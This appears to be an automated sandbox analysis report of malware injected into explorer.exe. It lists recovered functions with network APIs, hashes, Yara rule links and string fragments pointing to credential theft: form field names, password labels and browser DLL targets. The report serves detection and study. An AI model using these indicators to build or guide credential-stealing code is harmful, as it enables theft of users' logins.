                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID: .dll$el32$kern
                                                                                                                                            • API String ID: 1964310414-1222553051
                                                                                                                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                            • Instruction ID: 8ddca7850dc21c0570e04c33a4c51182df5c2f4f81a696c448e5e1807aca566c
                                                                                                                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                            • Instruction Fuzzy Hash: A1417974918A088FCB84EFA8C889BAD77F0FB68301F44417AD84EDB255DE309945CB95
                                                                                                                                            Function 10DC072E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 289 10dc072e-10dc0768 290 10dc0788-10dc07ab connect 289->290 291 10dc076a-10dc0782 call 10dc3942 289->291 291->290
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: connect
                                                                                                                                            • String ID: conn$ect
                                                                                                                                            • API String ID: 1959786783-716201944
                                                                                                                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                            • Instruction ID: d6ffccd20d6c9468f1a14f2ac9f15aa457ec023a68aaa2def9c30a6d3e5ce387
                                                                                                                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                            • Instruction Fuzzy Hash: CB015E30618B188FCB84EF1CE088B55B7E0FB59314F1546AEE90DCB266CA74D9818BC2
                                                                                                                                            Function 10DC0732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 294 10dc0732-10dc0768 295 10dc0788-10dc07ab connect 294->295 296 10dc076a-10dc0782 call 10dc3942 294->296 296->295
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: connect
                                                                                                                                            • String ID: conn$ect
                                                                                                                                            • API String ID: 1959786783-716201944
                                                                                                                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                            • Instruction ID: a73417ea0cbfc18e1b8b751281e7cdd0448635732e6c238483d463d26e08ee87
                                                                                                                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                            • Instruction Fuzzy Hash: F5012170618A1C8FCBC4EF5CE048B5577E0FB59315F1541AEA80DCB266CA74D9818BC2
                                                                                                                                            Function 10DC06B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 407 10dc06b2-10dc06e5 408 10dc0705-10dc072d send 407->408 409 10dc06e7-10dc06ff call 10dc3942 407->409 409->408
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: send
                                                                                                                                            • String ID: send
                                                                                                                                            • API String ID: 2809346765-2809346765
                                                                                                                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                            • Instruction ID: 96cfdb963ce0102681923fc862a28a5908502bba9b6a6f5f242e3827e1c42d2e
                                                                                                                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                            • Instruction Fuzzy Hash: 83012570518A1C8FDBC8DF1CD049B1577E0FB58314F1646AEE85DCB266CA70D881CB81
                                                                                                                                            Function 10DC05B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 412 10dc05b2-10dc05ea 413 10dc05ec-10dc0604 call 10dc3942 412->413 414 10dc060a-10dc062b socket 412->414 413->414
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: socket
                                                                                                                                            • String ID: sock
                                                                                                                                            • API String ID: 98920635-2415254727
                                                                                                                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                            • Instruction ID: 59c3eb225dabba2611ffaa3c27c91122d663a7dba8e5db162ac9f18c338a968e
                                                                                                                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                            • Instruction Fuzzy Hash: 9F01447061861C8FC784DF1CD048B54BBE0FB59354F1545AEE45ECB266C7B0C981CB86
                                                                                                                                            Function 10DB82DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 417 10db82dd-10db8320 call 10dc3942 420 10db83fa-10db840e 417->420 421 10db8326 417->421 422 10db8328-10db8339 SleepEx 421->422 422->422 423 10db833b-10db8341 422->423 424 10db834b-10db8352 423->424 425 10db8343-10db8349 423->425 427 10db8370-10db8376 424->427 428 10db8354-10db835a 424->428 425->424 426 10db835c-10db836a call 10dc2f12 425->426 426->427 430 10db8378-10db837e 427->430 431 10db83b7-10db83bd 427->431 428->426 428->427 430->431 435 10db8380-10db838a 430->435 432 10db83bf-10db83cf call 10db8e72 431->432 433 10db83d4-10db83db 431->433 432->433 433->422 437 10db83e1-10db83f5 call 10db80f2 433->437 435->431 438 10db838c-10db83b1 call 10db9432 435->438 437->422 438->431
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                            • Instruction ID: c49aa5eea7d2671269d9b4b61192e325b1d127b63c5d5c4781f6dddfeb24ecb0
                                                                                                                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                            • Instruction Fuzzy Hash: BC3169B4A04B49DFDB94EF29808A295F7E0FB56300F48427EC91ECB206CB74A450CFA1
                                                                                                                                            Function 10DB8412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 453 10db8412-10db8446 call 10dc3942 456 10db8448-10db8472 call 10dc5c9e CreateThread 453->456 457 10db8473-10db847d 453->457
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                            • Instruction ID: b7a7e6dc25f4e39cf196d19c57544de96bc9803a7d8e6930fadd7031ef1c1387
                                                                                                                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                            • Instruction Fuzzy Hash: FCF04634228B080FD788EF2CD44263AF3D0FBE9200F40063EA58DC3264CE38C5828716

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 0FAF4D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                            • API String ID: 0-393284711
                                                                                                                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                            • Instruction ID: f597629c414e81af4998a49b0638caff56b1659257c3297ed998d071f4522d6e
                                                                                                                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                            • Instruction Fuzzy Hash: A1E16F74518F488FC765EFA4C4847AAB7E0FF58300F504A2EA59BCB256DF38A505CB85
                                                                                                                                            Function 0FAF7792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                            • API String ID: 0-2916316912
                                                                                                                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                            • Instruction ID: fad9b7e1954622c6e2fec7b4aec950593f23cf5ec5dbd60e0b79037c26c04825
                                                                                                                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                            • Instruction Fuzzy Hash: 3CB18F30518B488FDB55EFA8C485AEEB7F1FF58300F50461EE59ACB252EF7894098B85
                                                                                                                                            Function 0FAF5622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                            • API String ID: 0-1539916866
                                                                                                                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                            • Instruction ID: ac32ae1dcb5187b4791ddaec67ffe1b9aa58cd1dd450e38ec03cc67554cf4599
                                                                                                                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                            • Instruction Fuzzy Hash: 6741B470A18B08CFDB14DF88A8456BD7BF2FB48700F44025EE509DB246DBB99D498BD6
                                                                                                                                            Function 0FAFCAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                            • API String ID: 0-355182820
                                                                                                                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                            • Instruction ID: a1648c8bd58740f3c07ee50e76ed49239526066bef4cf601d96b89dab5acc64e
                                                                                                                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                            • Instruction Fuzzy Hash: 4CC16B75218B098FC759EFA4C4856DAF3E1FB94304F40472EA59ACB211DF38A619CBC6
                                                                                                                                            Function 0FAFCF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                            • API String ID: 0-97273177
                                                                                                                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                            • Instruction ID: 67a6a0723bffdb24f9ca4d3345fe502f8a2903016f0a7db40b0fc8cecdc3da8f
                                                                                                                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                            • Instruction Fuzzy Hash: 4951E8315187488FD71ADF54D4812AAB7E5FBC4700F50192EF9CBCB252DBB8950ACB82
                                                                                                                                            Function 0FAF62F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                            • API String ID: 0-639201278
                                                                                                                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                            • Instruction ID: b24fd372408fd901122a56eec2e67924c740266cec3d19b2a52d933b4f60ecf2
                                                                                                                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                            • Instruction Fuzzy Hash: 14C18370618B194FC758EFA8D495AEAF3E1FB94300F904329A54ECB256DF38A909C7C5
                                                                                                                                            Function 0FAF62F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                            • API String ID: 0-639201278
                                                                                                                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                            • Instruction ID: a78a153cac72e410da8541b03ebae218ddd6260bc37c209f5daa3652547df006
                                                                                                                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                            • Instruction Fuzzy Hash: 76C18370618B194FC758EFA8D4956EAF3E1FB94300F904329A54ECB256DF38A909C7C5
                                                                                                                                            Function 0FAF7CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                            • API String ID: 0-2058692283
                                                                                                                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                            • Instruction ID: 2e291af16d33d65201e84a57222bd9ed5a4e494a4dbab34719ebfdd1cefca005
                                                                                                                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                            • Instruction Fuzzy Hash: 02A18F706187488FDB29EFA8D4447EEB7E1FB88300F40462DE58ADB252EE7895498785
                                                                                                                                            Function 0FAF7CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                            • API String ID: 0-2058692283
                                                                                                                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                            • Instruction ID: d2a2eb2ef3394bd3299260e4257dfaa1cc57914f88c724de06b4b7a4e8a1e82d
                                                                                                                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                            • Instruction Fuzzy Hash: A59180706187488FDB29EFA8D4447EEB7E1FB88300F40462DE54ADB252EF789549C785
                                                                                                                                            Function 0FAF7352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $.$e$n$v
                                                                                                                                            • API String ID: 0-1849617553
                                                                                                                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                            • Instruction ID: 48464e8e5d2f0e42540aa61605420e89b71bb26a265d50a4a77a9991607b814f
                                                                                                                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                            • Instruction Fuzzy Hash: 1571A7316187498FD754EFA8C4847AAB7F5FF54304F00062EE54ACB261EF79D9498781
                                                                                                                                            Function 0FAF2C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                            • API String ID: 0-1970020201
                                                                                                                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                            • Instruction ID: 188089aa8b2b9d6b1a95adcbfcc47b61b44855cd6cdfe984ad367f4f21c9b762
                                                                                                                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                            • Instruction Fuzzy Hash: BE5180B0914B4C8FDB65EFA4C0846EEB7F1FF58300F40462EA59AE7215EF3495458B89
                                                                                                                                            Function 0FAF386F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4$\$dll$ion.$vers
                                                                                                                                            • API String ID: 0-1610437797
                                                                                                                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                            • Instruction ID: b44adf1a02620ef9e892cc44668039223df135a8669a05fd82f876cfb2002368
                                                                                                                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                            • Instruction Fuzzy Hash: EB418330228B488FCB75EF6498457EA77E4FB99301F40462EAA4ECB241EF35D5098782
                                                                                                                                            Function 0FAF54B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                            • API String ID: 0-327345718
                                                                                                                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                            • Instruction ID: e3c3e70e62d330d536ed5b994a132ecc80fba3115d7dce0fe9822c44d6e68727
                                                                                                                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                            • Instruction Fuzzy Hash: 18415234A18F0D8FCB94EFA8C0947ED77E6FB98300F54456AA90EDB211DA78D5448BC5
                                                                                                                                            Function 0FAF3432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .dll$el32$h$kern
                                                                                                                                            • API String ID: 0-4264704552
                                                                                                                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                            • Instruction ID: 8d301300572f3fac0c95b3384ad5c55176f1fc6b9e4841113df654c624760508
                                                                                                                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                            • Instruction Fuzzy Hash: 68419270608B488FDB69DF6880843AAF7E1FBD8301F504A2FA59EC7256DB74D549CB81
                                                                                                                                            Function 0FAFA0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $Snif$f fr$om:
                                                                                                                                            • API String ID: 0-3434893486
                                                                                                                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                            • Instruction ID: 81035076ddfacb03700b7e9ddfa7c134b03adc75d688153ec3eb4beaf7c58582
                                                                                                                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                            • Instruction Fuzzy Hash: A531053150CB885FD71AEB68C4846DAB7D0FB94300F50491EE59BCB252EF38A549CB43
                                                                                                                                            Function 0FAFA0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $Snif$f fr$om:
                                                                                                                                            • API String ID: 0-3434893486
                                                                                                                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                            • Instruction ID: d3237c3641558138eb09b540c2fa9ba2fd33db93471954f9e284ec4ebf117a0c
                                                                                                                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                            • Instruction Fuzzy Hash: 6331E371508B486FD719EB68C4846EAB7D4FB94300F40491EE59BCB252EF38E54ACB43
                                                                                                                                            Function 0FAF5FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                                                                            • API String ID: 0-3136806129
                                                                                                                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                            • Instruction ID: e32ac1df2d0c701cdc7ae2e33ba47b8b22a0a30c65a10b9dd7107016c4c52a5e
                                                                                                                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
